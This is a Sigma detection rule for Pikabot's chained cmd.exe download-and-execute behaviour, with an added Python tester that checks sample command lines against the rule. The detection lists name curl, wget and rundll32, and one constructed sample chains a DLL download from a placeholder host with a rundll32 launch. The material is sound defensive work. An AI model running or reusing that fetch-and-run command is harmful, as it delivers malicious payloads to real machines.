Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.

Sigma rule

title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
status: test
description: |
    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
    Commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files.
    In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
references:
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
author: Alejandro Houspanossian ('@lekz86')
date: 2024-01-02
tags:
    - attack.defense-evasion
    - attack.command-and-control
    - attack.execution
    - attack.t1059.003
    - attack.t1105
    - attack.t1218
    - detection.emerging-threats
logsource:
    product: windows
    category: process_creation
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'cmd'
            - '/c'
    selection_pipes:
        CommandLine|contains:
            - ' & '
            - ' || '
    selection_commands_1:
        CommandLine|contains:
            - ' curl'
            - ' wget'
            - ' timeout '
            - ' ping '
    selection_commands_2:
        CommandLine|contains:
            - ' rundll32'
            - ' mkdir '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
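To see how the four selections combine under `all of selection_*`, here is an added Python evaluator (not part of the rule or of the Sigma project) that applies the same case-insensitive substring tests to a few constructed process command lines; the sample command lines, hostnames and paths are made up for illustration.

```python
"""Evaluate this rule's selections over constructed CommandLine values.

Mirrors the Sigma `contains` (any token) and `contains|all` (every token)
modifiers and the `all of selection_*` condition. Sample data is constructed,
not real telemetry.
"""

SELECTIONS = {
    # selection_cmd uses contains|all: every token must be present
    "selection_cmd": ("all", ["cmd", "/c"]),
    # the remaining selections use contains: any one token suffices
    "selection_pipes": ("any", [" & ", " || "]),
    "selection_commands_1": ("any", [" curl", " wget", " timeout ", " ping "]),
    "selection_commands_2": ("any", [" rundll32", " mkdir "]),
}


def selection_matches(command_line: str, mode: str, tokens: list) -> bool:
    """Sigma string matching is case-insensitive; `contains` is a substring test."""
    haystack = command_line.lower()
    hits = [token.lower() in haystack for token in tokens]
    return all(hits) if mode == "all" else any(hits)


def evaluate(command_line: str) -> dict:
    """Return the per-selection results plus the final rule verdict under `match`."""
    results = {name: selection_matches(command_line, mode, tokens)
               for name, (mode, tokens) in SELECTIONS.items()}
    results["match"] = all(results.values())  # condition: all of selection_*
    return results


# Constructed command lines in the shape the rule describes (hypothetical paths/hosts).
SAMPLES = {
    "chained_download": "cmd /c mkdir C:\\Users\\Public\\x & curl http://example.invalid/a.dll "
                        "-o C:\\Users\\Public\\x\\a.dll & rundll32 C:\\Users\\Public\\x\\a.dll,Entry",
    "chained_delay": "cmd.exe /c ping 127.0.0.1 -n 5 & rundll32 C:\\Users\\Public\\p.dll,Run",
    "benign_ping": "cmd /c ping 127.0.0.1",            # no chaining operator, no rundll32/mkdir
    "benign_chain": "cmd /c mkdir build & echo done",  # no download or delay command
}

if __name__ == "__main__":
    for name, command_line in SAMPLES.items():
        verdict = evaluate(command_line)
        failed = [k for k, v in verdict.items() if k != "match" and not v]
        print(f"{name:18s} match={verdict['match']} missing={failed}")
```

The two benign samples show why the rule requires all four selections: a lone `ping` or a `mkdir & echo` chain each satisfies only part of the pattern.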
